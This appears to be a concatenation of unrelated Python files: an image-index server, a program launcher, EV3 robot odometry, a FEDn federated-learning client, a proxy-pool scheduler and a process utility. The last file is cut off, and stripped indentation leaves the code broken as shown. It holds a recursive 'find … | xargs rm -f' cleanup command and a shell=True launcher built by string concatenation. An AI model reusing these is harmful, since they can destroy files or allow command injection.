created_files = _create_index_files(dir_path, True)
if (PIL_ENABLED):
# If PIL is enabled, we'd like to process the HTML indexes to include
# generated thumbnails - this slows down generation so we don't do it
# first time around, but now we're serving it's good to do in the
# background
print('Performing PIL-enchanced optimised index file generation in background')
background_indexer = BackgroundIndexFileGenerator(dir_path)
background_indexer.run()
elif sys.argv[1] == "cleanup":
# Clean up the index files created earlier so we don't make a mess of
# the image directories
#_clean_up(created_files)
os.system("find . -name '*.html'|xargs rm -f")
else:
# Run the server in the current location - this blocks until it's stopped
_run_server()
if __name__ == '__main__':
# Generate indices and serve from the current directory downwards when run
# as the entry point
serve_dir('.')
|
cplib.py | # -*- encoding: utf-8 -*-
import sys
import os.path
import subprocess
from multiprocessing import Process
__version__ = (0, 4, 0)
if 'python.exe' in sys.executable:
PATH = os.path.dirname(os.path.realpath(sys.argv[0]))
else:
PATH = os.path.dirname(os.path.realpath(sys.executable))
DATA = os.path.join(PATH, 'custom_path.csv')
def print_list():
progs = None
with open(DATA, 'r', encoding='utf-8') as apps:
progs = apps.read().split('\n')
del apps
for prg in range(1, len(progs)):
print(progs[prg].split(',')[0])
def exec_program(prog, args):
return subprocess.call('"%s" %s' % (search_program(prog), ' '.join(args)), shell=True)
def nowait_process(args):
pid = subprocess.Popen(args).pid
def exec_nowait(prog, args_):
progfull = search_program(prog)
arglist = list()
arglist.append(progfull)
if len(args_) > 0:
arglist.append(args_)
process = Process(target=nowait_process, args=[arglist])
process.start()
sys.exit(0)
def show_path(prog, args):
print('"%s" %s' % (search_program(prog), ' '.join(args)))
def search_program(prog):
if not os.path.isfile(DATA):
raise NoProgramListException()
progs = None
with open(DATA, 'r', encoding='utf-8') as apps:
progs = apps.read()
del apps
proglist = progs.split('\n')[1:]
for progitem in proglist:
if prog+'.' in progitem:
return progitem.split(',')[1]
else:
raise ProgramNotFoundException()
def add_program(prog, path):
duplicate = False
if not os.path.isfile(DATA):
with open(DATA, 'w', encoding='utf-8') as apps:
apps.write('program,path')
del apps
with open(DATA, 'r', encoding='utf-8') as apps:
if prog in apps.read():
duplicate = True
del apps
if duplicate:
raise DuplicateProgramException()
with open(DATA, 'a', encoding='utf-8') as apps:
apps.write('\n%s,%s' % (prog, path))
del apps
return True
class NoProgramListException(Exception):
pass
class ProgramNotFoundException(Exception):
pass
class DuplicateProgramException(Exception):
pass |
euler.py | #!/usr/bin/env python3
from ev3dev2.motor import Motor, SpeedRPS, MoveTank
from ev3dev2.sensor.lego import ColorSensor, UltrasonicSensor
from ev3dev2.power import PowerSupply
from math import pi, sin, cos, atan
from threading import Thread
import numpy as np
from time import sleep, time
class sensores_y_bateria:
def __init__(self, sonar, sensor_color):
self._sonar = UltrasonicSensor(sonar)
self._color = ColorSensor(sensor_color)
self._bateria = PowerSupply()
#Bateria
@property
def voltaje_bateria(self):
return self._bateria.measured_volts
@property
def correinte_bateria(self):
return self._bateria.measured_amps
#Sensor sonar
@property
def distancia_sonar(self):
return (self._sonar.distance_centimeters / 100)
@property
def otros_Sensores_presentes(self):
return self._sonar.other_sensor_present
#Sensor color
def calibrar_blaco(self):
self._color.calibrate_white()
@property
def color(self):
return self._color.color
@property
def nombre_color(self):
return self._color.color_name
@property
def ambiente(self):
return self._color.ambient_light_intensity
@property
def reflexion(self):
return self._color.reflected_light_intensity
@property
def rgb(self):
return self._color.rgb
class movimiento:
def __init__(self, motor_izquierdo, motor_derecho, diametro_rueda, separacion_ruedas):
self._motor_izquierdo = Motor(motor_izquierdo)
self._motor_derecho = Motor(motor_derecho)
self._dos_motores = MoveTank(motor_izquierdo, motor_derecho)
self._radio = diametro_rueda/2
self._sruedas = separacion_ruedas
def _SpeedRadPS(self, value):
return SpeedRPS(value/(2*pi))
#Motores separados
@property
def w_motor_derecho(self):
return 2*pi*(self._motor_derecho.speed/self._motor_derecho.count_per_rot)
@w_motor_derecho.setter
def w_motor_derecho(self, velocidad):
self._motor_derecho.on(self._SpeedRadPS(velocidad))
@property
def w_motor_izquierdo(self):
return 2*pi*(self._motor_izquierdo.speed/self._motor_izquierdo.count_per_rot)
@w_motor_izquierdo.setter
def w_motor_izquierdo(self, velocidad):
self._motor_izquierdo.on(self._SpeedRadPS(velocidad))
@property
def dc_motor_izquierdo(self):
return self._motor_izquierdo.duty_cycle
@dc_motor_izquierdo.setter
def dc_motor_izquierdo(self, ciclo):
self._motor_izquierdo.run_direct(duty_cycle_sp = ciclo)
@property
def dc_motor_derecho(self):
return self._motor_derecho.duty_cycle
@dc_motor_derecho.setter
def dc_motor_derecho(self, ciclo):
self._motor_derecho.run_direct(duty_cycle_sp = ciclo)
#Ambos motores
def correr(self, linear, angular):
self._derecha = ((linear)+((angular*self._sruedas)/2))/self._radio
self._izquierda = ((linear)-((angular*self._sruedas)/2))/self._radio
self._dos_motores.on(self._SpeedRadPS(self._izquierda), self._SpeedRadPS(self._derecha))
def correr_tiempo(self, linear, angular, seconds, bloqueo):
self._derecha = ((linear)+((angular*self._sruedas)/2))/self._radio
self._izquierda = ((linear)-((angular*self._sruedas)/2))/self._radio
self._dos_motores.on_for_seconds(self._SpeedRadPS(self._izquierda), self._SpeedRadPS(self._derecha), seconds, block = bloqueo)
def parar(self):
self._dos_motores.off()
@property
def velocidad_linear(self):
return ((self.w_motor_derecho+self.w_motor_izquierdo)/2)*self._radio
@property
def velocidad_angular(self):
return ((self.w_motor_derecho-self.w_motor_izquierdo)*self._radio)/self._sruedas
class odometria(movimiento):
def __init__(self, motor_izquierdo, motor_derecho, diametro_rueda, separacion_ruedas):
movimiento.__init__(self, motor_izquierdo, motor_derecho, diametro_rueda, separacion_ruedas)
self._perimetro_rueda = 2*pi*self._radio
self._tiempo_espera = 0.01
self._posicion_robot = [0.0, 0.0, 0.0, 0.0]
self._odometria_activa = False
self._escribir_fichero_activo = False
self._f = None
def empezar_odometria(self, posicion):
self._posicion_robot = posicion
def _hilo_odometria():
izquierda_anterior = 0.0
derecha_anterior = 0.0
while self._odometria_activa:
izquierda_actual = self._motor_izquierdo.position
derecha_actual = self._motor_derecho.position
ticks_izquierda = izquierda_actual - izquierda_anterior
ticks_derecha = derecha_actual - derecha_anterior
if not ticks_izquierda and not ticks_derecha:
if self._tiempo_espera:
sleep(self._tiempo_espera)
continue
izquierda_anterior = izquierda_actual
derecha_anterior = derecha_actual
rotacion_izquierda = float(ticks_izquierda / self._motor_izquierdo.count_per_rot)
rotacion_derecha = float(ticks_derecha / self._motor_derecho.count_per_rot)
distancia_izquierda = float(rotacion_izquierda * self._perimetro_rueda)
distancia_derecha = float(rotacion_derecha * self._perimetro_rueda)
distancia_total = (distancia_izquierda + distancia_derecha) / 2.0
rotacion_total = (distancia_derecha - distancia_izquierda) / self._sruedas
self._posicion_robot[0] += distancia_total * cos(self._posicion_robot[3])
self._posicion_robot[1] += distancia_total * sin(self._posicion_robot[3])
self._posicion_robot[3] += rotacion_total
if self._tiempo_espera:
sleep(self._tiempo_espera)
self._odometria_activa = True
self._id_hilo_odometria = Thread(target = _hilo_odometria)
self._id_hilo_odometria.start()
def parar_odometria(self):
self._odometria_activa = False
self._id_hilo_odometria.join(timeout=None)
@property
def posicion(self):
return self._posicion_robot
def empezar_posicion_fichero(self, nombre_fichero):
self._f = open(nombre_fichero,"w")
def _hilo_fichero():
i = 0
while self._escribir_fichero_activo:
self._f.write(str(i)+ " "+str(self._posicion_robot)+"\n")
i = i + 1
sleep(self._tiempo_espera)
self._escribir_fichero_activo = True
self._id_hilo_fichero = Thread(target = _hilo_fichero)
self._id_hilo_fichero.start()
def parar_posicion_fichero(self):
self._escribir_fichero_activo = False
self._id_hilo_fichero.join(timeout=None)
self._f.close()
|
client.py | import json
import os
import tempfile
import threading
import time
import fedn.common.net.grpc.fedn_pb2 as fedn
import fedn.common.net.grpc.fedn_pb2_grpc as rpc
import grpc
# TODO Remove from this level. Abstract to unified non implementation specific client.
from fedn.utils.dispatcher import Dispatcher
CHUNK_SIZE = 1024 * 1024
from datetime import datetime
from fedn.clients.client.state import ClientState, ClientStateToString
from fedn.utils.helpers import get_helper
class Client:
"""FEDn Client. """
def __init__(self, config):
from fedn.common.net.connect import ConnectorClient, Status
self.connector = ConnectorClient(config['discover_host'],
config['discover_port'],
config['token'],
config['name'],
config['preferred_combiner'],
config['client_id'],
secure=config['secure'],
preshared_cert=config['preshared_cert'],
verify_cert=config['verify_cert'])
self.name = config['name']
self.started_at = datetime.now()
self.logs = []
client_config = {}
print("Asking for assignment",flush=True)
import time
while True:
status, response = self.connector.assign()
if status == Status.TryAgain:
time.sleep(5)
continue
if status == Status.Assigned:
client_config = response
break
time.sleep(5)
print(".", end=' ', flush=True)
print("Got assigned!", flush=True)
# TODO use the client_config['certificate'] for setting up secure comms'
if client_config['certificate']:
import base64
cert = base64.b64decode(client_config['certificate']) # .decode('utf-8')
credentials = grpc.ssl_channel_credentials(root_certificates=cert)
channel = grpc.secure_channel("{}:{}".format(client_config['host'], str(client_config['port'])),
credentials)
else:
channel = grpc.insecure_channel("{}:{}".format(client_config['host'], str(client_config['port'])))
self.connection = rpc.ConnectorStub(channel)
self.orchestrator = rpc.CombinerStub(channel)
self.models = rpc.ModelServiceStub(channel)
print("Client: {} connected {} to {}:{}".format(self.name,
"SECURED" if client_config['certificate'] else "INSECURE",
client_config['host'], client_config['port']), flush=True)
if config['remote_compute_context']:
from fedn.common.control.package import PackageRuntime
pr = PackageRuntime(os.getcwd(), os.getcwd())
retval = None
tries = 10
while tries > 0:
retval = pr.download(config['discover_host'], config['discover_port'], config['token'])
if retval:
break
time.sleep(60)
print("No compute package availabe... retrying in 60s Trying {} more times.".format(tries),flush=True)
tries -= 1
if retval:
pr.unpack()
self.dispatcher = pr.dispatcher()
try:
self.dispatcher.run_cmd("startup")
except KeyError:
print("No startup code present. skipping")
else:
# TODO: Deprecate
dispatch_config = {'entry_points':
{'predict': {'command': 'python3 predict.py'},
'train': {'command': 'python3 train.py'},
'validate': {'command': 'python3 validate.py'}}}
dispatch_dir = os.getcwd()
self.dispatcher = Dispatcher(dispatch_config, dispatch_dir)
self.lock = threading.Lock()
if 'model_type' in client_config.keys():
self.helper = get_helper(client_config['model_type'])
if not self.helper:
print("Failed to retrive helper class settings! {}".format(client_config),flush=True)
threading.Thread(target=self._send_heartbeat, daemon=True).start()
threading.Thread(target=self.__listen_to_model_update_request_stream, daemon=True).start()
threading.Thread(target=self.__listen_to_model_validation_request_stream, daemon=True).start()
self.state = ClientState.idle
def get_model(self, id):
"""Fetch model from the Combiner. """
from io import BytesIO
data = BytesIO()
for part in self.models.Download(fedn.ModelRequest(id=id)):
if part.status == fedn.ModelStatus.IN_PROGRESS:
data.write(part.data)
if part.status == fedn.ModelStatus.OK:
return data
if part.status == fedn.ModelStatus.FAILED:
return None
return data
def set_model(self, model, id):
"""Upload a model to the Combiner. """
from io import BytesIO
if not isinstance(model, BytesIO):
bt = BytesIO()
for d in model.stream(32 * 1024):
bt.write(d)
else:
bt = model
bt.seek(0, 0)
def upload_request_generator(mdl):
i = 1
while True:
b = mdl.read(CHUNK_SIZE)
if b:
result = fedn.ModelRequest(data=b, id=id, status=fedn.ModelStatus.IN_PROGRESS)
else:
result = fedn.ModelRequest(id=id, status=fedn.ModelStatus.OK)
yield result
if not b:
break
result = self.models.Upload(upload_request_generator(bt))
return result
def __listen_to_model_update_request_stream(self):
"""Subscribe to the model update request stream. """
r = fedn.ClientAvailableMessage()
r.sender.name = self.name
r.sender.role = fedn.WORKER
metadata = [('client', r.sender.name)]
import time
while True:
try:
for request in self.orchestrator.ModelUpdateRequestStream(r, metadata=metadata):
if request.sender.role == fedn.COMBINER:
# Process training request
global_model_id = request.model_id
# TODO: Error handling
self.send_status("Received model update request.", log_level=fedn.Status.AUDIT,
type=fedn.StatusType.MODEL_UPDATE_REQUEST, request=request)
tic = time.time()
model_id, meta = self.__process_training_request(global_model_id)
processing_time = time.time()-tic
meta['processing_time'] = processing_time
print(meta,flush=True)
if model_id != None:
# Notify the combiner that a model update is available
update = fedn.ModelUpdate()
update.sender.name = self.name
update.sender.role = fedn.WORKER
update.receiver.name = request.sender.name
update.receiver.role = request.sender.role
update.model_id = request.model_id
update.model_update_id = str(model_id)
update.timestamp = str(datetime.now())
update.correlation_id = request.correlation_id
update.meta = json.dumps(meta)
#TODO: Check responses
response = self.orchestrator.SendModelUpdate(update)
self.send_status("Model update completed.", log_level=fedn.Status.AUDIT,
type=fedn.StatusType.MODEL_UPDATE, request=update)
else:
self.send_status("Client {} failed to complete model update.",
log_level=fedn.Status.WARNING,
request=request)
except grpc.RpcError as e:
status_code = e.code()
timeout = 5
print("CLIENT __listen_to_model_update_request_stream: GRPC ERROR {} retrying in {}..".format(
status_code.name, timeout), flush=True)
import time
time.sleep(timeout)
def __listen_to_model_validation_request_stream(self):
"""Subscribe to the model validation request stream. """
r = fedn.ClientAvailableMessage()
r.sender.name = self.name
r.sender.role = fedn.WORKER
while True:
try:
for request in self.orchestrator.ModelValidationRequestStream(r):
# Process training request
model_id = request.model_id
# TODO: Error handling
self.send_status("Recieved model validation request.", log_level=fedn.Status.AUDIT,
type=fedn.StatusType.MODEL_VALIDATION_REQUEST, request=request)
metrics = self.__process_validation_request(model_id)
if metrics != None:
# Send validation
validation = fedn.ModelValidation()
validation.sender.name = self.name
validation.sender.role = fedn.WORKER
validation.receiver.name = request.sender.name
validation.receiver.role = request.sender.role
validation.model_id = str(model_id)
validation.data = json.dumps(metrics)
self.str = str(datetime.now())
validation.timestamp = self.str
validation.correlation_id = request.correlation_id
response = self.orchestrator.SendModelValidation(validation)
self.send_status("Model validation completed.", log_level=fedn.Status.AUDIT,
type=fedn.StatusType.MODEL_VALIDATION, request=validation)
else:
self.send_status("Client {} failed to complete model validation.".format(self.name),
log_level=fedn.Status.WARNING, request=request)
except grpc.RpcError as e:
status_code = e.code()
timeout = 5
print("CLIENT __listen_to_model_validation_request_stream: GRPC ERROR {} retrying in {}..".format(
status_code.name, timeout), flush=True)
import time
time.sleep(timeout)
def __process_training_request(self, model_id):
self.send_status("\t Starting processing of training request for model_id {}".format(model_id))
self.state = ClientState.training
try:
meta = {}
tic = time.time()
mdl = self.get_model(str(model_id))
meta['fetch_model'] = time.time()-tic
import sys
inpath = self.helper.get_tmp_path()
with open(inpath,'wb') as fh:
fh.write(mdl.getbuffer())
outpath = self.helper.get_tmp_path()
tic = time.time()
#TODO: Check return status, fail gracefully
self.dispatcher.run_cmd("train {} {}".format(inpath, outpath))
meta['exec_training'] = time.time()-tic
tic = time.time()
import io
out_model = None
with open(outpath, "rb") as fr:
out_model = io.BytesIO(fr.read())
import uuid
updated_model_id = uuid.uuid4()
self.set_model(out_model, str(updated_model_id))
meta['upload_model'] = time.time()-tic
os.unlink(inpath)
os.unlink(outpath)
except Exception as e:
print("ERROR could not process training request due to error: {}".format(e),flush=True)
updated_model_id = None
meta = {'status':'failed','error':str(e)}
self.state = ClientState.idle
return updated_model_id, meta
def __process_validation_request(self, model_id):
self.send_status("Processing validation request for model_id {}".format(model_id))
self.state = ClientState.validating
try:
model = self.get_model(str(model_id))
inpath = self.helper.get_tmp_path()
with open(inpath, "wb") as fh:
fh.write(model.getbuffer())
_,outpath = tempfile.mkstemp()
self.dispatcher.run_cmd("validate {} {}".format(inpath, outpath))
with open(outpath, "r") as fh:
validation = json.loads(fh.read())
os.unlink(inpath)
os.unlink(outpath)
except Exception as e:
print("Validation failed with exception {}".format(e), flush=True)
raise
self.state = ClientState.idle
return None
self.state = ClientState.idle
return validation
def send_status(self, msg, log_level=fedn.Status.INFO, type=None, request=None):
"""Send status message. """
from google.protobuf.json_format import MessageToJson
status = fedn.Status()
status.timestamp = str(datetime.now())
status.sender.name = self.name
status.sender.role = fedn.WORKER
status.log_level = log_level
status.status = str(msg)
if type is not None:
status.type = type
if request is not None:
status.data = MessageToJson(request)
self.logs.append(
"{} {} LOG LEVEL {} MESSAGE {}".format(str(datetime.now()), status.sender.name, status.log_level,
status.status))
response = self.connection.SendStatus(status)
def _send_heartbeat(self, update_frequency=2.0):
"""Send a heartbeat to the Combiner. """
while True:
heartbeat = fedn.Heartbeat(sender=fedn.Client(name=self.name, role=fedn.WORKER))
try:
self.connection.SendHeartbeat(heartbeat)
except grpc.RpcError as e:
status_code = e.code()
print("CLIENT heartbeat: GRPC ERROR {} retrying..".format(status_code.name), flush=True)
import time
time.sleep(update_frequency)
def run_web(self):
from flask import Flask
app = Flask(__name__)
from fedn.common.net.web.client import page, style
@app.route('/')
def index():
logs_fancy = str()
for log in self.logs:
logs_fancy += "<p>" + log + "</p>\n"
return page.format(client=self.name, state=ClientStateToString(self.state), style=style, logs=logs_fancy)
import os, sys
self._original_stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
app.run(host="0.0.0.0", port="8080")
sys.stdout.close()
sys.stdout = self._original_stdout
def run(self):
import time
threading.Thread(target=self.run_web, daemon=True).start()
try:
cnt = 0
old_state = self.state
while True:
time.sleep(1)
cnt += 1
if self.state != old_state:
print("CLIENT {}".format(ClientStateToString(self.state)), flush=True)
if cnt > 5:
print("CLIENT active", flush=True)
cnt = 0
except KeyboardInterrupt:
print("ok exiting..")
|
scheduler.py | #!/usr/bin/python
# -*- coding utf-8 -*-
# Project: ProxyPool
# Author: jiangnan
# Mail: jiangnanmax@gmail.com
# Date: 2018/12/6
import time
from multiprocessing import Process
import asyncio
import aiohttp
from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,\
ClientConnectorError
from proxypool.db import RedisClient
from proxypool.errors import ProxyResourceDepletionError
from proxypool.crawler import FreeProxyCrawler
from proxypool.settings import *
from asyncio import TimeoutError
class ValidtyTester(object):
test_proxy = TEST_PROXY
def __init__(self):
self._raw_proxies = None
self._valid_proxies = []
def set_raw_proxies(self, proxies):
self._raw_proxies = proxies
self._conn = RedisClient()
async def test_single_proxy(self, proxy):
try:
async with aiohttp.ClientSession() as session:
try:
if isinstance(proxy, bytes):
proxy = proxy.decode('utf-8')
real_proxy = 'https://' + proxy
print('Testing', proxy)
async with session.get(TEST_PROXY, proxy=real_proxy,
timeout=TEST_PROXY_TIMEOUT) as response:
if response.status == 200:
self._conn.put(proxy)
print('Valid proxy', proxy)
except (ProxyConnectionError, TimeoutError, ValueError):
print('Invalid proxy', proxy)
except (ServerDisconnectedError, ClientResponseError, ClientConnectorError) as s:
print(s)
pass
def test_all_proxies(self):
print("Running the ValidtyTester...")
try:
loop = asyncio.get_event_loop()
tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
loop.run_until_complete(asyncio.wait(tasks))
except ValueError:
print("Async error...")
class ProxyPoolAdder(object):
def __init__(self, upper_threshold):
self._conn = RedisClient()
self._crawler = FreeProxyCrawler()
self._tester = ValidtyTester()
self._upper_threshold = upper_threshold
def is_over_upper_threshold(self):
return self._conn.list_len >= self._upper_threshold
def add_proxies_to_pool(self):
print("Running the ProxyPoolAdder...")
raw_proxies_count = 0
while not self.is_over_upper_threshold():
for callback_type in range(self._crawler.__CrawlFuncCount__):
callback = self._crawler.__CrawlFunc__[callback_type]
raw_proxies = self._crawler.get_raw_proxies(callback=callback)
self._tester.set_raw_proxies(raw_proxies)
self._tester.test_all_proxies()
raw_proxies_count += len(raw_proxies)
if self.is_over_upper_threshold():
print("Proxies are enough...")
break
if raw_proxies_count == 0:
raise ProxyResourceDepletionError
class Scheduler(object):
@staticmethod
def test_proxies(cycle=PROXY_VALID_CHECK_CYCLE):
conn = RedisClient()
tester = ValidtyTester()
while True:
print("Testing the validty of proxies...")
count_to_test = int(0.5 * conn.list_len)
if count_to_test == 0:
print("The proxy pool is empty...")
time.sleep(cycle)
continue
raw_proxies = conn.get_for_test(count_to_test)
tester.set_raw_proxies(raw_proxies)
tester.test_all_proxies()
time.sleep(cycle)
@staticmethod
def check_pool_len(lower_thershold=PROXYPOOL_LOWER_THRESHOLD,
upper_threshold=PROXYPOOL_UPPER_THRESHOLD, cycle=PROXYPOOL_LEN_CHECK_CYCLE):
conn = RedisClient()
adder = ProxyPoolAdder(upper_threshold)
while True:
if conn.list_len < lower_thershold:
adder.add_proxies_to_pool()
time.sleep(cycle)
def run(self):
print("Running the scheduler...")
test_process = Process(target=Scheduler.test_proxies)
check_process = Process(target=Scheduler.check_pool_len)
check_process.start()
test_process.start() |
process.py | from concurrent.futures import ThreadPoolExecutor
from functools import reduce, wraps
import inspect
import io
import logging
import multiprocessing as mp
import os
import queue
import re
import select
import signal
import stat
import subprocess
import sys
import threading
import _thread
import traceback
import psutil
from .core import Namespace, as_list, flatten, fn_name
from .os import dir_of, to_mb
from .time import Timeout, Timer
log = logging.getLogger(__name__)
def run_subprocess(*popenargs,
input=None, capture_output=False, timeout=None, check=False, communicate_fn=None,
**kwargs):
"""
a clone of :function:`subprocess.run` which allows custom handling of communication
:param popenargs:
:param input:
:param capture_output:
:param timeout:
:param check:
:param communicate_fn:
:param kwargs:
:return:
"""
if input is not None:
if 'stdin' in kwargs:
raise ValueError('stdin and input arguments may not both be used.')
kwargs['stdin'] = subprocess.PIPE
if capture_output:
if kwargs.get('stdout') is not None or kwargs.get('stderr') is not None:
raise ValueError('stdout and stderr arguments may not be used '
'with capture_output.')
kwargs['stdout'] = subprocess.PIPE
kwargs['stderr'] = subprocess.PIPE
def communicate(process, input=None, timeout=None):
return (communicate_fn(process, input=input, timeout=timeout) if communicate_fn
else process.communicate(input=input, timeout=timeout))
with subprocess.Popen(*popenargs, **kwargs) as process:
try:
stdout, stderr = communicate(process, input, timeout=timeout)
except subprocess.TimeoutExpired as e:
process.kill()
if sys.platform == 'win32':
e.stdout, e.stderr = communicate(process)
else:
process.wait()
raise subprocess.TimeoutExpired(process.args, timeout, output=stdout, stderr=stderr)
except: # also handles kb interrupts
process.kill()
raise
retcode = process.poll()
if check and retcode:
raise subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr)
return subprocess.CompletedProcess(process.args, retcode, stdout, stderr)
def as_cmd_args(*args, **kwargs):
return list(filter(None,
[]
+ ([] if args is None else list(args))
+ flatten(kwargs.items(), flatten_tuple=True) if kwargs is not None else []
))
def run_cmd(cmd, *args, **kwargs):
params = Namespace(
input_str=None,
capture_output=True,
capture_error=True,
bufsize=-1,
text=True,
live_output=False, # one of (True, 'line', 'block', False)
output_level=logging.DEBUG,
error_level=logging.ERROR,
shell=True,
executable=None,
env=None,
preexec_fn=None,
timeout=None,
activity_timeout=None,
log_level=logging.INFO,
)
for k, v in params:
kk = '_'+k+'_'
if kk in kwargs:
params[k] = kwargs[kk]
del kwargs[kk]
cmd_args = as_cmd_args(*args, **kwargs)
full_cmd = flatten([cmd])+cmd_args
str_cmd = ' '.join(full_cmd)
log.log(params.log_level, "Running cmd `%s`", str_cmd)
log.debug("Running cmd `%s` with input: %s", str_cmd, params.input_str)
def live_output(process, input=None, **ignored):
mode = params.live_output
if mode is True:
mode = 'line'
if input is not None:
try:
with process.stdin as stream:
stream.write(input)
except BrokenPipeError:
pass
except:
raise
def read_pipe(pipe, timeout):
pipes = as_list(pipe)
ready, *_ = select.select(pipes, [], [], timeout)
reads = [''] * len(pipes)
for i, p in enumerate(pipes):
if p in ready:
line = p.readline()
if mode == 'line':
print(re.sub(r'\n$', '', line, count=1))
elif mode == 'block':
print(line, end='')
reads[i] = line
return reads if len(pipes) > 1 else reads[0]
output, error = zip(*iter(lambda: read_pipe([process.stdout if process.stdout else 1,
process.stderr if process.stderr else 2], params.activity_timeout),
['', '']))
print() # ensure that the log buffer is flushed at the end
return ''.join(output), ''.join(error)
try:
completed = run_subprocess(str_cmd if params.shell else full_cmd,
input=params.input_str,
timeout=params.timeout,
check=True,
communicate_fn=live_output if params.live_output and params.capture_output else None,
# stdin=subprocess.PIPE if params.input_str is not None else None,
stdout=subprocess.PIPE if params.capture_output else None,
stderr=subprocess.PIPE if params.capture_error else None,
shell=params.shell,
bufsize=params.bufsize,
universal_newlines=params.text,
executable=params.executable,
env=params.env,
preexec_fn=params.preexec_fn)
if completed.stdout:
log.log(params.output_level, completed.stdout)
if completed.stderr:
log.log(params.error_level, completed.stderr)
return completed.stdout, completed.stderr
except subprocess.CalledProcessError as e:
if e.stdout:
log.log(params.output_level, e.stdout)
if e.stderr:
log.log(params.error_level, e.stderr)
# error_tail = tail(e.stderr, 25) if e.stderr else 'Unknown Error'
# raise subprocess.SubprocessError("Error when running command `{cmd}`: {error}".format(cmd=full_cmd, error=error_tail))
raise e
def run_script(script_path, *args, **kwargs):
mod = os.stat(script_path).st_mode
os.chmod(script_path, mod | stat.S_IEXEC)
return run_cmd(script_path, *args, **kwargs)
def call_script_in_same_dir(caller_file, script_file, *args, **kwargs):
here = dir_of(caller_file)
script_path = os.path.join(here, script_file)
return run_script(script_path, *args, **kwargs)
def get_thread(tid=None):
return (threading.current_thread() if tid is None
else threading.main_thread() if tid == 0
else next(filter(lambda t: t.ident == tid, threading.enumerate()), None))
def get_process(pid=None):
pid = (os.getpid() if pid is None
else os.getppid() if pid == 0
else pid)
return psutil.Process(pid) if psutil.pid_exists(pid) else None
def kill_proc_tree(pid=None, include_parent=True, timeout=None, on_terminate=None):
def on_proc_terminated(proc):
log.info("Process %s terminated with exit code %s", proc, proc.returncode)
if on_terminate is not None:
on_terminate(proc)
parent = get_process(pid)
children = parent.children(recursive=True)
if include_parent:
children.append(parent)
for proc in children:
log.warning("Terminating process %s.", proc)
proc.terminate()
terminated, alive = psutil.wait_procs(children, timeout=timeout, callback=on_proc_terminated)
for proc in alive:
log.warning("Killing process %s.", proc)
proc.kill()
def call_in_subprocess(target, *args, **kwargs):
def call_target(q, *args, **kwargs):
try:
result = target(*args, **kwargs)
q.put_nowait(result)
except BaseException as e:
log.exception(e)
q.put_nowait(e)
q = mp.Queue(maxsize=1)
p = mp.Process(target=call_target, args=(q, *args), kwargs=kwargs)
try:
p.start()
p.join()
result = q.get_nowait()
if isinstance(result, BaseException):
raise result
else:
return result
except queue.Empty:
raise Exception("Subprocess running {} died abruptly.".format(target.__name__))
except BaseException:
try:
kill_proc_tree(p.pid)
except:
pass
raise
def system_cores():
return psutil.cpu_count()
def system_memory_mb():
vm = psutil.virtual_memory()
return Namespace(
total=to_mb(vm.total),
available=to_mb(vm.available),
used_percentage=vm.percent
)
def system_volume_mb(root="/"):
du = psutil.disk_usage(root)
return Namespace(
total=to_mb(du.total),
free=to_mb(du.free),
used=to_mb(du.used),
used_percentage=du.percent
)
def signal_handler(sig, handler):
"""
:param sig: a signal as defined in https://docs.python.org/3.7/library/signal.html#module-contents
:param handler: a handler function executed when the given signal is raised in the current thread.
"""
prev_handler = None
def handle(signum, frame):
try:
handler()
finally:
# restore previous signal handler
signal.signal(sig, prev_handler or signal.SIG_DFL)
prev_handler = signal.signal(sig, handle)
def raise_in_thread(thread_id, exc):
"""
:param thread_id: the thread in which the exception will be raised.
:param exc: the exception to raise in the thread: it can be an exception class or an instance.
"""
import ctypes
tid = ctypes.c_long(thread_id)
exc_class = exc if inspect.isclass(exc) else type(exc.__class__.__name__, (exc.__class__,), dict(
__init__=lambda s: super(s.__class__, s).__init__(str(exc))
))
exc_class = ctypes.py_object(exc_class)
ret = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, exc_class)
if ret == 0:
raise ValueError(f"Nonexistent thread {thread_id}")
elif ret > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError(f"Failed raising exception in thread {thread_id}")
class InterruptTimeout(Timeout):
"""
A :class:`Timeout` implementation that can send a signal to the interrupted thread or process,
or raise an exception in the thread (works only for thread interruption)
if the passed signal is an exception class or instance.
"""
def __init__(self, timeout_secs, message=None, log_level=logging.WARNING,
interrupt='thread', sig=signal.SIGINT, ident=None, before_interrupt=None):
def interruption():
log.log(log_level, self.message)
if before_interrupt is not None:
before_interrupt()
while not self.interrupt_event.is_set():
try:
if interrupt == 'thread':
if isinstance(self.sig, (type(None), BaseException)):
exc = TimeoutError(self.message) if self.sig is None else self.sig
raise_in_thread(self.ident, exc)
else:
# _thread.interrupt_main()
signal.pthread_kill(self.ident, self.sig)
elif interrupt == 'process':
os.kill(self.ident, self.sig)
except Exception:
raise
finally:
self.interrupt_event.wait(1) # retry every second if interruption didn't work
super().__init__(timeout_secs, on_timeout=interruption)
if interrupt not in ['thread', 'process']:
raise ValueError("`interrupt` value should be one of ['thread', 'process'].")
tp = get_thread(ident) if interrupt == 'thread' else get_process(ident)
if tp is None:
raise ValueError(f"no {interrupt} with id {ident}")
if message is None:
id = f"ident={tp.ident}" if isinstance(tp, threading.Thread) else f"pid={tp.pid}"
self.message = f"Interrupting {interrupt} {tp.name} [{id}] after {timeout_secs}s timeout."
else:
self.message = message
self.ident = tp.ident if tp is not None else None
self.sig = sig(self.message) if inspect.isclass(sig) and BaseException in inspect.getmro(sig) else sig
self.interrupt_event = threading.Event()
def __exit__(self, exc_type, exc_val, exc_tb):
super().__exit__(exc_type, exc_val, exc_tb)
self.interrupt_event.set()
if self.timed_out:
if isinstance(self.sig, BaseException):
raise self.sig
elif self.sig is None:
return True
class Monitoring:
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False, thread_prefix="monitoring_"):
self._exec = None
self._name = name or os.getpid()
self._frequency = frequency_seconds
self._thread_prefix = thread_prefix
self._interrupt = threading.Event()
self._check_on_exit = check_on_exit
def __enter__(self):
if self._frequency > 0:
self._interrupt.clear()
self._exec = ThreadPoolExecutor(max_workers=1, thread_name_prefix=self._thread_prefix)
self._exec.submit(self._monitor)
return self
def __exit__(self, *args):
if self._exec is not None:
self._interrupt.set()
self._exec.shutdown(wait=False)
if self._check_on_exit:
self._check_state()
self._exec = None
def _monitor(self):
while not self._interrupt.is_set():
try:
self._check_state()
